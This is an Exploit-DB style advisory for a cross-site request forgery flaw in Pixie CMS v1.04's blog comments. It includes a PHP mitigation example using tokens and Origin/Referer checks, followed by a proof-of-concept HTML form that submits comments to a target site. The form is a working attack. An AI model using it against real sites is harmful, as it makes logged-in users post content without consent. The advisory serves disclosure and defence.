Vendor: Pixie CMS
By: hackme
CVSS: 5.5 (MEDIUM)
CWE: 352 (Cross-Site Request Forgery)
Product Name: Pixie CMS
Affected Version From: 01.04
Affected Version To: 01.04
Patch Exists: NO
Platforms Tested: Linux Ubuntu 10.10
2011

Pixie v1.04 blog post CSRF

The Pixie v1.04 blog post feature is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can create a crafted webpage that tricks a logged-in user into submitting a form on behalf of the attacker. This can lead to unauthorized actions being performed by the user without their knowledge or consent.

Mitigation:

To mitigate this vulnerability, implement CSRF protection measures such as anti-CSRF tokens and validation of the Referer header.
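One way to implement the two measures named above, as an added example that is not Pixie's code or part of the original advisory: a session-bound token compared in constant time, plus an Origin/Referer host check. The function names, the `csrf_token` field and the `blog.example` host are assumptions; the other field names are those of the comment form on this page.

```php
<?php
// Added example (hypothetical helper names, not Pixie's API).

// Issue, or reuse, a per-session token to embed as a hidden form field.
function csrf_issue_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Host named by the Origin header, falling back to Referer; null if neither parses.
function csrf_request_source(array $server): ?string {
    $raw  = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = is_string($raw) ? parse_url($raw, PHP_URL_HOST) : null;
    return is_string($host) ? strtolower($host) : null;
}

// Accept a state-changing POST only if both checks pass.
// Rejecting requests that carry no Origin/Referer at all is a policy choice made here.
function csrf_validate(array $session, array $post, array $server, string $expectedHost): bool {
    $source = csrf_request_source($server);
    if ($source === null || $source !== strtolower($expectedHost)) {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // is_string() guards against array-valued parameters such as csrf_token[]=x.
    return is_string($supplied) && $expected !== '' && hash_equals($expected, $supplied);
}

// Constructed demo requests: $session, $post and $server stand in for
// $_SESSION, $_POST and $_SERVER so the script runs from the CLI.
$session = [];
$token   = csrf_issue_token($session);
$fields  = ['name' => 'alice', 'email' => 'alice@blog.example',
            'comment' => 'hello', 'comment_submit' => 'invia', 'post' => '1'];

// Same-site submission carrying the token issued with the form.
$sameSite = csrf_validate($session, $fields + ['csrf_token' => $token],
                          ['HTTP_ORIGIN' => 'http://blog.example'], 'blog.example');

// Cross-site submission: no token, Referer names another host.
$crossSite = csrf_validate($session, $fields,
                           ['HTTP_REFERER' => 'http://other.example/page.html'], 'blog.example');

var_dump($sameSite, $crossSite);
```

In a real handler the token from `csrf_issue_token()` is rendered into the comment form as a hidden `csrf_token` input, and `csrf_validate()` runs before the comment is stored.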

Exploit-DB raw data:

# Exploit Title: Pixie v1.04 blog post CSRF
# Google Dork:
# Date: 11-Dec-2011
# Author: hackme
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip 
# Version: 1.04
# Tested on: Linux Ubuntu 10.10
# CVE :
[+] TH4NKZ T0: broiosen,ReGun and hackgame.it
[+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post 
[+] Post Method
[+] exploit:

<form method="POST" action="http://127.0.0.1/pixie/?s=blog&m=permalink&x=my-first-post">
name: <input type="Text" name="name" id="name" size="15"/><br>
e-mail: <input type="Text" name="email" id="email" size="15"/>
<br>web(optional): <input type="Text" name="web" id="web" size="15"/><br>
comment: <input type="Text" name="comment" id="comment" size="15"/><br>
<input type="Submit" name="comment_submit" id="comment_submit" value="invia" size="15"/>
<input type="Hidden" name="post" id="post" value="1"/></form>